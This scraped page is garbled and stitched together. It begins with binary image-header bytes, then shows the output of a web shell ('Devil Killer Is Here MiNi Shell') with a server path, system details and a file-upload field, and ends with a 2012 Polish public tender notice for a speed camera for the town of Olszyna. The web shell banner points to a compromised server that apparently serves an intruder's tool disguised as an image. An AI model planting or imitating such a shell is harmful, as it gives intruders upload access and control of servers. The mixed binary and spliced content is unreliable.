JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120614/201728-N-2012.html

<p class="kh_header"><b>Olszyna: DOSTAWA FOTORADARU DLA STRAŻY MIEJSKIEJ W OLSZYNIE.</b><br>
<b>Numer ogłoszenia: 201728 - 2012; data zamieszczenia: 14.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Olszyna , ul. Wolności 6, 59-830 Olszyna, woj. dolnośląskie, tel. 075 7212368, faks 075 7212050.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.olszyna.nv.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA FOTORADARU DLA STRAŻY MIEJSKIEJ W OLSZYNIE..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa przyrządu do pomiaru prędkości i rejestracji pojazdów przekraczających dopuszczalną prędkość (dalej fotoradar) wraz                                    z wyposażeniem. Zamawiający chce dokonać zakupu fotoradaru, który był już eksploatowany nie dłużej niż 12 miesięcy.

Fotoradar musi posiadać możliwość zamontowania w masztach będących                            w posiadaniu Zamawiającego, znajdujących się w: Olszynie Dolnej, Olszynie                          i Biedrzychowicach. Wykonawca zapewni możliwość montażu urządzenia na masztach poprzez dostosowanie fotoradaru do istniejących masztów lub poprzez modernizację istniejących masztów. Zamawiający dopuszcza również możliwość montażu nowych masztów w miejscach istniejących, w ramach realizacji niniejszego zamówienia. Wszystkie koszty związane z wprowadzeniem rozwiązań umożliwiających funkcjonowanie fotoradaru w istniejących masztach lub związane z dostawą i montażem nowych masztów ponosi Wykonawca. W przypadku montażu nowych masztów - stare maszty zostaną oddane dla Zamawiającego.

Dostarczony fotoradar musi być kompatybilny z programem komputerowym FET TRAFIC do obróbki zdjęć, będącym w posiadaniu Zamawiającego.

Minimalne wymagane przez Zamawiającego parametry techniczne fotoradaru:
rejestracja wykroczeń w ruchu drogowym polegających na przekroczeniu dozwolonej prędkości przez pojazdy,
pomiar prędkości w zakresie co najmniej od 25 km/h do 250 km/h, oraz wybór prędkości progowych w podanym zakresie ze skokiem co 1 km/h,
nieprzerwana praca przez 8 godzin na zasilaniu akumulatorowym 12V w wersji przenośnej,
nieprzerwana praca przez 24 godziny na dobę po zamontowaniu w obudowie na maszcie,
praca na statywie w temperaturze otoczenia od -10°C do +60°C,
praca przyrządu zamontowanego na maszcie w temperaturze otoczenia od -30°C do +60°C,
praca na statywie (trójnogu) pozwalającym na wypoziomowanie i posadowienie urządzenia w terenie o nierównym podłożu,
rejestracja wykroczeń drogowych o dobrej jakości obrazu, w każdych warunkach pogodowych dnia i nocy, bez konieczności przeprowadzania ręcznej korekty ustawień parametrów aparatu fotograficznego takich jak: ostrość, czułość oraz czas otwarcia migawki,
rejestracja oraz umieszczenie w kadrze zdjęcia następujących danych: data, czas, lokalizacja urządzenia, obowiązująca prędkość na danym odcinku drogi, wskazanie prędkości pojazdu, którego prędkość została zmierzona, numeru kolejnego zdjęcia, trybu, dla jakiego realizowany jest pomiar prędkości (pojazdy odjeżdżające lub nadjeżdżające oraz obu kierunków równocześnie) wraz z odpowiednim zapisem w języku polskim                   w zestawie danych ewidencyjnych dot. każdego z zarejestrowanych wykroczeń,
wykonywanie dobrej jakości zdjęć bez efektu powstawania refleksów na przednich szybach lub tylnych szybach pojazdów w zależności od kierunku dokonywania pomiarów i rejestracji wykroczeń drogowych, przy użyciu specjalistycznych filtrów antyrefleksyjnych lub innych skutecznych metod przeciwdziałania temu zjawisku,
 wysoka dokładność pomiaru prędkości pojazdu mieszcząca się w zakresie +/- 3 km/h dla prędkości do 100 km/h oraz +/- 3 km/h  dla prędkości powyżej 100 km/h,
odporność na zakłócenia elektromagnetyczne, nie stwarzanie zagrożenia dla otoczenia,
dokonywanie pomiarów prędkości zarówno dla pojazdów nadjeżdżających, odjeżdżających oraz z obu kierunków równocześnie,
rejestracja wykroczeń drogowych w ilości minimum 2 wykroczeń/sekundę,
automatyczna zmiana dozwolonej prędkości (np.: na obszarze zabudowanym)                           w godzinach nocnych wraz z odpowiednim zapisem w zestawie danych ewidencyjnych dotyczących każdego z zarejestrowanych wykroczeń,
automatyczny restart urządzenia po zaniku zasilania oraz automatyczny powrót do ostatnich ustawień i konfiguracji, skutkujących kontynuacją pracy urządzenia oraz rejestracją wykroczeń drogowych, bez konieczności ingerencji człowieka z zewnątrz. W przypadku braku zasilania lub awarii urządzenia, wszystkie zarejestrowane do momentu zaniku zasilania lub awarii dane muszą zostać zachowane w urządzeniu. W przypadku wyposażenia urządzenia rejestrującego w dodatkowy akumulator, który pełni rolę awaryjnego zasilania,
ciągła praca w trybie 24 godzinnym z włączoną lampą błyskową bez przegrzewania się urządzenia,
rejestracja oraz zapis zarejestrowanych wykroczeń w ruchu drogowym na nośniku danych takich jak dysk twardy, karta SD lub pamięć typu FLASH co najmniej 30 000 wykroczeń drogowych bez konieczności ich kasowania lub nadpisywania,
odpowiedni poziom bezpieczeństwa zgromadzonych danych w urządzeniu poprzez zastosowanie kryptograficznych algorytmów ich szyfrowania w sposób zapewniający sprawdzenie czy zestaw danych ewidencyjnych każdego wykroczenia nie został poddany modyfikacji,
bezpieczeństwo zgromadzonych w przyrządzie danych dotyczących zarejestrowanych naruszeń, polegające na zapewnieniu braku możliwości dostępu i usunięcia tych danych w sposób nieautoryzowany przez osoby do tego celu niepowołane,
możliwość podłączenia do niego dodatkowych urządzeń zewnętrznych w szczególności takich jak:
komputer przenośny,
modem do transmisji danych,
urządzenie monitorujące stan pracy przyrządu pomiarowego poprzez porty USB oraz LAN
komunikacja z urządzeniem rejestrującym za pośrednictwem dołączonego wyświetlacza dotykowego lub panelu sterującego lub komputera przenośnego typu Laptop. W przypadku połączenia przewodowego należy urządzenie wyposażyć w przewód łączący o długości minimalnej 2m. Wszystkie komendy oraz komunikaty muszą być wyświetlane w języku polskim, a oznakowania przycisków oraz piktogramy czytelne dla użytkownika,
rejestrowanie danych statystycznych takich jak: liczba przejeżdżających wszystkich pojazdów, liczba pojazdów przekraczających dozwoloną prędkość, liczba wykonanych zdjęć, czas pracy urządzenia,
zdalna diagnostyka oraz konfiguracja, poprzez możliwość zdalnego połączenia się za pośrednictwem sieci LAN i Wi-Fi,
zasilanie napięciem znamionowym  12V DC  dla wersji podstawowej przenośnej lub 230 V AC /50Hz gdy urządzenie zostaje zainstalowane w maszcie stacjonarnym,

W przypadku dostawy wraz z urządzeniem rejestrującym dedykowanej dla niego obudowy, musi ona spełniać następujące kryteria:
a) obudowa musi być odporna na celowe działania niszczące i dewastacyjne, wandalizmu poprzez zastosowanie w obudowie odpowiednich zabezpieczeń
b) musi posiadać zamknięcie, zabezpieczające przed dostępem osób nieuprawnionych oraz być wykonana w taki sposób, aby zabezpieczać urządzenie przed niekorzystnymi warunkami atmosferycznymi,
c) musi być wykonana z materiałów zapewniających skuteczną ochronę antykorozyjną przez okres min. 7 lat
d) obudowa masztu musi być wyposażona w czujnik temperatury oraz czujnik bezwładnościowy lub czujnik uderzenia.
e) obudowa na stacjonarne urządzenia rejestrujące musi spełniać wymagania zawarte                      w Rozporządzeniu Ministra Infrastruktury z dnia 17.06.2011 w sprawie warunków lokalizacji i sposobu oznakowania miejsca dokonywania pomiarów przez urządzenia rejestrujące oraz Rozporządzenia z dnia 22.06.2011r zmieniające rozporządzenie w sprawie szczególnych warunków technicznych dla znaków i sygnalizacji drogowych oraz urządzeń BRD                               i warunków ich umieszczania na drogach.

Fotoradar musi posiadać w szczególności:
a) ważną Decyzję Zatwierdzenia Typu wydaną przez Prezesa Głównego Urzędu Miar,                      z której wynika, że urządzenie może być zamontowane i rejestrować wykroczenia drogowe   w obudowie na konkretnym typie masztu zainstalowanym na poboczu drogi.
b) orzeczenie (wydane przez uprawnione laboratorium) dotyczące spełnienia wymagań zawartych w rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 29 listopada 2002 r. w sprawie najwyższych dopuszczalnych stężeń i natężeń czynników szkodliwych dla zdrowia w środowisku pracy (Dz. U. 2002 nr 217 poz.1833 ze zm.) oraz rozporządzeniu Ministra Środowiska z dnia 30 października 2003 r. w sprawie dopuszczalnych poziomów elektromagnetycznych w środowisku oraz sposobów sprawdzania dotrzymania tych poziomów (Dz.U. 2003 nr 192 poz. 1883),
c) w odniesieniu do masztów (obudów) urządzeń rejestrujących - dokumenty potwierdzające, że maszt wraz z obudową przeznaczone do współpracy ze stacjonarnym urządzeniem rejestrującym mogą być wprowadzone do obrotu, tj. dokumenty określone w zapisach ustawy z dnia 16 kwietnia 2004 o wyrobach budowlanych (Dz. U. z 2004 Nr.92 poz. 881 z póź. zm.), albo  dokumenty stanowiące podstawę oznakowania obudów wraz z konstrukcją wsporczą znakiem CE, zgodnie z art. 5 ust. 1 pkt. 1 ustawy z dnia 16 kwietnia 2004 o wyrobach budowlanych (Dz. U. z 2004 Nr.92 poz. 881 z późn. zm.), albo  dokumenty potwierdzające legalne wprowadzenie obudów wraz z konstrukcją wsporcza do obrotu w innym państwie członkowskim UE oraz, że ich właściwości użytkowe umożliwiają spełnienie wymagań podstawowych przez obiekty budowlane zaprojektowane i budowane w sposób określony w odrębnych przepisach, w tym przepisach techniczno-budowlanych oraz zgodnie z zasadami wiedzy technicznej, zgodnie z art. 5 ust. 1 pkt. 4, - przy czym obowiązek posiadania dokumentów, o których mowa w lit. c), nie dotyczy wykonawców, którzy złożą ofertę na realizację dostawy fotoradaru z możliwością montażu na istniejących masztach bez modernizacji.
d) fotoradar musi posiadać aktualną legalizację Urzędu Miar.
e) fotoradar musi odpowiadać wymaganiom określonym w Rozporządzeniu Ministra Gospodarki z dnia 9 listopada 2007 roku w sprawie wymagań, którym powinny odpowiadać przyrządy do pomiaru prędkości pojazdów w ruchu drogowym oraz szczegółowego zakresu badań i sprawdzeń wykonywanych podczas prawnej kontroli metrologicznej tych przyrządów pomiarowych (Dz. U. Nr 225 z 2007 roku, poz. 1663).

Jeżeli zapewnienie funkcjonowania fotoradaru w masztach w: Olszynie, Olszynie Dolnej i Biedrzychowicach -  będzie wymagało wykonania prac instalacyjnych nowego masztu lub jego elementów, Wykonawca zobowiązany jest do wykonania na własny koszt wszystkich niezbędnych prac instalacyjnych oraz uzyskania wszystkich wymaganych polskim prawem zezwoleń na posadowienie konstrukcji masztu w pasie drogowym i uzgodnień oraz uzyskania pozwolenia na jego użytkowanie. 

Inne wymagania Zamawiającego.
Programy, oprogramowanie, pulpity sterownicze oraz instrukcje winny być w języku polskim.
Brak możliwości usunięcia zdjęcia przez obsługę.
Gwarancja - minimum 24 miesiące oraz  rękojmia za wady na okres minimum 24 m-cy. od dnia przekazania urządzenia Zamawiającemu. 
Autoryzowany serwis pogwarancyjny na terenie kraju, w tym usunięcie awarii w terminie 7 - dniowym od daty zgłoszenia urządzenia do naprawy. W przypadku przedłużającej się naprawy zapewnienie urządzenia zastępczego
Bezpłatna pomoc techniczna; konsultacje w okresie gwarancji.
Brak możliwości ingerencji w informacje zarejestrowane w czasie pomiaru.
Wykonywanie legalizacji urządzenia na terenie kraju.
Wykonawca przeszkoli na koszt własny wskazanych strażników Straży Miejskiej w Olszynie (w siedzibie Straży Miejskiej w Olszynie ul. Wolności 6, konkretna data zostanie podana na piśmie z 7-dniowym wyprzedzeniem) w zakresie obsługi dostarczonego sprzętu, oprogramowania do obsługi urządzenia do stopnia bezbłędnego praktycznego opanowania przez nich umiejętności obsługi urządzenia, co zostanie potwierdzone wydanym zaświadczeniem ukończenia takiego szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.99.60.00-5, 48.70.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie uznany za spełniony, jeżeli wykonawca oświadczy, że spełnia ww. warunek.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej dwie dostawy fotoradarów (wraz z instalacją                                   i uruchomieniem). Ocena spełniania warunku będzie dokonana na podstawie złożonego wykazu wykonanych dostaw i  dokumentów potwierdzających, że dostawy te zostały wykonane należycie - ZAŁĄCZNIK NR 3 DO SIWZ. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie uznany za spełniony, jeżeli wykonawca oświadczy, że spełnia ww. warunek.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie uznany za spełniony, jeżeli wykonawca oświadczy, że spełnia ww. warunek.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie uznany za spełniony, jeżeli wykonawca oświadczy, że spełnia ww. warunek.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenia dotyczące art. 22 ust. 1 i art. 24 ust. 1 ustawy Pzp, oferta, stosowne pełnomocnictwa.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonywania zmian postanowień zawartej -                        w wyniku niniejszego zamówienia - umowy w stosunku do treści oferty (art. 144 PZP), na podstawie której dokonano wyboru Wykonawcy, w sytuacji konieczności wprowadzenia takich zmian wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub gdy zmiany  te będą korzystne dla Zamawiającego,                                        a w szczególności przewiduje się możliwość dokonania w umowie:
1) zmiany jakości, parametrów lub innych cech charakterystycznych dla przedmiotu zamówienia;
2)  zmianę elementów składowych przedmiotu zamówienia na zasadzie ich uzupełnienia lub wymiany;
3)  zmianę sposobu i terminów dostarczania poszczególnych elementów zamówienia;
4)  zmianę terminu realizacji przedmiotu umowy;
5)  zmianę okresu obowiązywania umowy, w tym w szczególności o czas konieczny dla przeprowadzenia kolejnego przetargu na analogiczny przedmiot zamówienia;
6)   zmiany ceny ofertowej w przypadku zaistnienia urzędowej zmiany stawki podatku VAT, przy zachowaniu jej ceny netto;
Warunkiem dokonania zmian wskazanych powyżej, w szczególności może być:
      1)  nastąpi zmiana organizacyjna po stronie Zamawiającego, w szczególności w zakresie jego organizacji i funkcjonowania;
2)   wymagać tego będzie prawidłowa realizacja przez Wykonawcę zadań objętych realizacją zamówienia;
3)  w wyniku zmiany umowy możliwe będzie podniesienie poziomu/jakości wykonywanych dostaw; 
4)   będzie to konieczne ze względu na zapewnienie bezpieczeństwa lub zapobieżenie awarii;
5)   będzie to konieczne ze względu na zmianę przepisów prawa;
6)   zmiana w inny sposób dostarczy pożytku Zamawiającemu;
